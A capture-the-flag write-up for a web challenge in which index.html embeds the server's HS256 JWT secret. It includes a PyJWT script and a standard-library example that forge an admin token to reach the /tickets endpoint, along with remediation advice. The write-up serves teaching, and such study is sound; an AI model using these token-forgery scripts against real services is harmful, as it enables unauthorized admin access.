rosehacks@pwny$ cat binary_basis.txt
The solution for this challenge turned out to be surprisingly easy! Ironically, I spent the most time on it because I was overthinking and making it harder than necessary. Initially, I tried every JWT vulnerability trick I knew, especially since I couldn't find anything unusual in the code. The SECRET in utils.py was redacted, leading me to believe that I needed to brute-force it, or that there might be a deeper exploit to uncover...
The Application
The Solution
From the code review, we identified that the /tickets endpoint runs a SQL query that returns every submitted ticket, including one from the admin that contains the flag. Our objective was to reach /tickets, but there was an obstacle: the endpoint reads the username claim from the JWT payload and verifies the token's signature against the server's JWT secret, so simply editing the claim is not enough.
At first we assumed we did not have this secret, so we explored other avenues. However, the one file we had not examined closely, index.html, turned out to embed the JWT secret inside a script tag: the client-side code imports the same HMAC-SHA256 key the server uses. Because HS256 is a symmetric scheme, anyone who can read that key can mint tokens the server will accept. This meant we could forge a JWT with username set to admin, sign it with the discovered secret, and access the /tickets endpoint as the admin.
// Excerpt from index.html: the HS256 signing key is built from a hard-coded string,
// so the secret is visible to every visitor who reads the page source.
const secretKey = await crypto.subtle.importKey(
  "raw",
  new TextEncoder().encode("halloween-secret"),
  { name: "HMAC", hash: "SHA-256" },
  false,
  ["sign"],
);
Generate JWT Script
import jwt  # PyJWT (pip install PyJWT)

# The secret key recovered from the script tag in index.html
secret_key = "halloween-secret"

# The payload: the only claim /tickets checks is username, so set it to "admin"
payload = {
    "username": "admin",
    "iat": 1729902153,  # issued-at time; any Unix timestamp works, e.g. int(time.time())
}

# Sign the token with HS256, the same algorithm and key the server verifies with
token = jwt.encode(payload, secret_key, algorithm="HS256")
print("Generated JWT for admin:", token)
After generating the admin JWT, I entered it into the browser's cookie storage in place of my own token and refreshed the tickets page, which revealed the flag!
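As an added example (not code from the write-up or from the challenge itself), the same forgery done with only the Python standard library, next to a model of the check the server performs. The `tickets_endpoint` function is a hypothetical stand-in for the challenge's /tickets handler, written here to show why the leaked secret is the whole attack: a token with the right claims but the wrong key, or a guest token whose payload is spliced onto an admin payload, is rejected by the same HMAC comparison that accepts the properly signed forgery.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# The HS256 secret recovered from index.html in the write-up.
LEAKED_SECRET = "halloween-secret"

# Standard JWT header for HS256; its base64url form is the familiar "eyJhbGciOiJIUzI1NiIs..." prefix.
HEADER = {"alg": "HS256", "typ": "JWT"}


def b64url(data: bytes) -> str:
    """Base64url without '=' padding, as RFC 7515 requires for JWS segments."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url: restore the stripped padding before decoding."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def forge_hs256(payload: dict, secret: str) -> str:
    """Mint a JWT: HMAC-SHA256 over 'base64url(header).base64url(payload)', keyed with `secret`."""
    signing_input = (
        b64url(json.dumps(HEADER, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_hs256(token: str, secret: str) -> Optional[dict]:
    """Model of the server-side check: recompute the MAC and compare in constant time.

    Returns the claims when the signature is valid, None for any malformed, wrongly
    signed, or non-HS256 token (pinning 'alg' blocks alg-confusion tricks such as "none").
    """
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None
        expected = hmac.new(
            secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256
        ).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return None
        claims = json.loads(b64url_decode(payload_b64))
        return claims if isinstance(claims, dict) else None
    except ValueError:  # wrong segment count, bad base64, or bad JSON
        return None


def tickets_endpoint(token: str, server_secret: str) -> str:
    """Hypothetical stand-in for the challenge's /tickets handler (assumed, not the real code):
    a valid signature is required, and only username == 'admin' gets the admin ticket."""
    claims = verify_hs256(token, server_secret)
    if claims is None:
        return "401 invalid token"
    if claims.get("username") != "admin":
        return "403 not admin"
    return "200 admin ticket returned"


if __name__ == "__main__":
    # 1. Forge an admin token with the leaked secret: accepted.
    admin_token = forge_hs256({"username": "admin", "iat": int(time.time())}, LEAKED_SECRET)
    print(admin_token)
    print(tickets_endpoint(admin_token, LEAKED_SECRET))
    # 2. Same claims, guessed secret: rejected, which is why the leak matters.
    print(tickets_endpoint(forge_hs256({"username": "admin"}, "guess"), LEAKED_SECRET))
    # 3. Splicing the admin payload onto a legitimate guest token's signature: rejected.
    guest = forge_hs256({"username": "guest"}, LEAKED_SECRET).split(".")
    spliced = ".".join([guest[0], admin_token.split(".")[1], guest[2]])
    print(tickets_endpoint(spliced, LEAKED_SECRET))
```

The fix on the application side is the obvious one: the signing key must live only on the server (or the client must be issued tokens by the server rather than minting its own), and any verifier should pin the expected algorithm rather than trusting the `alg` field in an attacker-controlled header.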